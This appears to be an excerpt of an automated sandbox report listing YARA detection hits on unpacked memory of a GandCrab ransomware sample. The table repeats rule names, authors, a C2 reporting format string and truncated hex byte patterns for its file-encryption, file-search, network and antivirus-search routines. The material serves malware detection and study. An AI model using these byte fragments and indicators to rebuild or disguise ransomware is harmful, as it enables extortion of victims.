10 C7 45 B8 BC 03 01 10 C7 45 BC ...
34.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
34.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
34.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
34.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
34.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
33.3.ssapst.exe.3d30000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.3.ssapst.exe.3d30000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.3.ssapst.exe.3d30000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.3.ssapst.exe.3d30000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.3.ssapst.exe.3d30000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.3.ssapst.exe.3d30000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
4.3.ssapst.exe.38c0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
4.3.ssapst.exe.38c0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
4.3.ssapst.exe.38c0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
4.3.ssapst.exe.38c0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
4.3.ssapst.exe.38c0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
4.3.ssapst.exe.38c0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
31.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
31.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
31.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
31.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
31.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
31.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
25.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
25.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
25.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
25.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
25.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
25.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
30.3.ssapst.exe.2fc0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
30.3.ssapst.exe.2fc0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
30.3.ssapst.exe.2fc0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
30.3.ssapst.exe.2fc0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
30.3.ssapst.exe.2fc0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
30.3.ssapst.exe.2fc0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
6.3.ssapst.exe.2f70000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
6.3.ssapst.exe.2f70000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
6.3.ssapst.exe.2f70000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
6.3.ssapst.exe.2f70000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
6.3.ssapst.exe.2f70000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
6.3.ssapst.exe.2f70000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
14.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
14.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
33.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
33.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
33.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
33.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
33.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
33.3.ssapst.exe.3d30000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
33.3.ssapst.exe.3d30000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
33.3.ssapst.exe.3d30000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
33.3.ssapst.exe.3d30000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
33.3.ssapst.exe.3d30000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
33.3.ssapst.exe.3d30000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
12.3.ssapst.exe.3730000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
12.3.ssapst.exe.3730000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
12.3.ssapst.exe.3730000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.ssapst.exe.3730000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
12.3.ssapst.exe.3730000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.ssapst.exe.3730000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 